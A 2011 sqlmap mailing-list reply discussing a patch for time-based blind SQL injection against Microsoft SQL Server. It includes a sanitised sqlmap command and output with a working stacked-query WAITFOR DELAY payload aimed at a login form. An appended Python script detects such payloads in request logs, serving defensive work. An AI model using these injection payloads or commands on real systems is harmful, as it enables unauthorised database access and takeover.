Re: [sqlmap-users] New SQL Server blind test
From: Steve P. <ste...@gm...> - 2011-01-18 00:48:25
On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
> Hi Steve.
>
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
>
> So, basically, you are proposing time based sql injection payload (e.g.):
>
> IF(1=1) WAITFOR DELAY '0:0:1'
>
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
>
> KR
>

Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)

Should work as an OR or AND statement, but then the present logical state
of the query matters.

Here's the output from my successful run using the patch, sanitised for
public viewing:

./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 05:54:02

[05:54:02] [INFO] using 'bogonExampleData' as session file
[05:54:02] [INFO] testing connection to the target url
[05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[05:54:02] [INFO] testing if the url is stable, wait a few seconds
[05:54:04] [INFO] url is stable
[05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
[05:54:08] [INFO] testing sql injection on POST parameter 'id'
[05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
[05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause'
[05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
[05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable
[05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase time-based
    Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
---

[05:55:18] [INFO] testing Microsoft SQL Server
[05:55:38] [INFO] confirming Microsoft SQL Server
[05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

[05:56:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 18 times
[05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'

[*] shutting down at: 05:56:40

-- 
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com        |
| GPG public key ID CD31CAFB          |
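The time-based probe discussed in this thread leaves two traces a defender can correlate: a WAITFOR DELAY literal in the request parameter and a response that actually took that long (the run above also produced 18 HTTP 500s). The following is an added example, not code from this thread or from sqlmap, that scans constructed request-log records for such payloads and marks a hit as confirmed only when the measured response time reached the requested delay; the log format and sample records are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Matches the T-SQL delay primitive used by the time-based test,
# e.g. WAITFOR DELAY '0:0:20' (hours:minutes:seconds).
WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)

# Constructed sample records (hypothetical request log, not real traffic):
# method, path, raw URL-encoded POST body, HTTP status, response time in seconds.
SAMPLE_LOG = [
    ("POST", "/Login.asp", "id=asdf&pwd=asdf", 200, 0.3),
    ("POST", "/Login.asp",
     "id=asdf%27+WAITFOR+DELAY+%270%3A0%3A20%27--+AND+%27uNsX%27%3D%27uNsX&pwd=asdf",
     500, 20.4),
    ("POST", "/Login.asp", "id=asdf%27+WAITFOR+DELAY+%270%3A0%3A5%27--&pwd=x", 500, 0.2),
]

def delay_seconds(match):
    """Convert the h:m:s groups of a WAITFOR DELAY literal to whole seconds."""
    hours, minutes, seconds = (int(g) for g in match.groups())
    return hours * 3600 + minutes * 60 + seconds

def find_time_based_payloads(records):
    """Flag every parameter carrying a WAITFOR DELAY payload.

    A finding is 'confirmed' when the observed response time reached the
    requested delay, i.e. the database really executed the injected delay,
    which is exactly the signal a time-based blind probe relies on."""
    findings = []
    for _method, path, body, status, elapsed in records:
        params = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
        for name, values in params.items():
            for value in values:
                match = WAITFOR_RE.search(value)
                if not match:
                    continue
                requested = delay_seconds(match)
                findings.append({
                    "path": path, "param": name, "status": status,
                    "requested_delay": requested,
                    "confirmed": elapsed >= requested,
                })
    return findings

if __name__ == "__main__":
    for finding in find_time_based_payloads(SAMPLE_LOG):
        print(finding)
```

A payload that is present but not confirmed (the third record) still merits a look, but the confirmed hit is the one that shows the delay reached the database and is where an incident response should start.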